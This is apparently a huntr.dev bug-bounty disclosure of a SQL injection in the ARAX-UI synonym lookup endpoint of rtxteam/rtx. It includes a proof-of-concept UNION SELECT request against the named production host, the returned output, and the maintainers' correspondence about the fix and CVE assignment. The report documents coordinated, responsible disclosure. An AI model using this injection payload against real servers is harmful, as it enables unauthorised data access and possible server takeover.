SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in rtxteam/rtx

Valid

Reported on

Apr 16th 2022


Description

The /rtxcomplete/nodeslike endpoint in the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection. It is possible to include a malicious SQL payload in the word query parameter for this endpoint that would allow an attacker to dump the database, make modifications to data, or delete data. In addition it is possible to completely takeover the server where the application is hosted, by performing remote code execution via this vulnerability.

Proof of Concept

Perform a GET request to:

https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018

The server will return JSON in the HTTP response, with the SQLite version as "3.11.0" as part of the first item in the array:

jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);

Impact

This vulnerability is critical as it can lead to remote code execution and thus complete server takeover.

We are processing your report and will contact the rtxteam/rtx team within 24 hours. a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the rtxteam/rtx team and are waiting to hear back a month ago
rtxteam/rtx maintainer
a month ago

Thank you for reporting this issue. We have created a SECURITY.md file per your suggestion sent via email. We are working on a fix for this issue. Thank you for keeping the issue private until we have had a chance to fix it.

rtxteam/rtx maintainer
a month ago

Thank you, we have fixed the issue with commit https://github.com/RTXteam/RTX/commit/fa2797e656e3dba18f990a2db1f0f029d41f1921

Thank you for reporting this issue to our team.

Jordan Sherman
a month ago

Researcher


Thanks for the update @maintainer! @admin can we get a CVE for this?

We have sent a follow up to the rtxteam/rtx team. We will try again in 7 days. a month ago
Jamie Slome
a month ago

Admin


@maintainer - are you able to mark as valid and fixed using the resolve button below?

rtxteam/rtx maintainer
a month ago

Hi Jordan, what is a CVE? Please pardon my ignorance.

Jordan Sherman
a month ago

Researcher


Hi @maintainer. No problem, happy to help. A CVE is simply an ID for this vulnerability. The mission of the CVE Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. There is one CVE Record for each vulnerability in the catalog. The vulnerabilities are discovered then assigned and published by organizations from around the world that have partnered with the CVE Program, such as this platform (Huntr). Please see here for more info: https://www.cve.org/About/Overview

Jamie Slome
a month ago

Admin


Just for further clarity, we take care of the entire CVE process for you, so there is nothing for you to do, except give us the go-ahead to publish one 👍

rtxteam/rtx maintainer
a month ago

Thank you, Jordan. It turns out we have deployed the fix to one of our two production servers. Deployment to another production server involves coordinating with a federal agency (NIH) and may take a few days. Thank you for your patience.

Jamie Slome
a month ago

Admin


👍

We have sent a second follow up to the rtxteam/rtx team. We will try again in 10 days. a month ago
rtxteam/rtx maintainer
a month ago

Hi Jordan and Jamie, OK, I have confirmed that the patch was also deployed to the NIH's servers, and thus, we are ready to resolve this issue. Thank you for your patience, and big thank you for reporting this security vulnerability through the huntr.dev program.

rtxteam/rtx maintainer validated this vulnerability a month ago
Jordan Sherman has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
rtxteam/rtx maintainer confirmed that a fix has been merged on fa2797 a month ago
The fix bounty has been dropped
Jamie Slome
25 days ago

Admin


Great work to all involved! 👍

A CVE has been assigned and should be published shortly. More generally, this makes the rtxteam look like they take security seriously and are doing a great job at resolving security issues :)

to join this conversation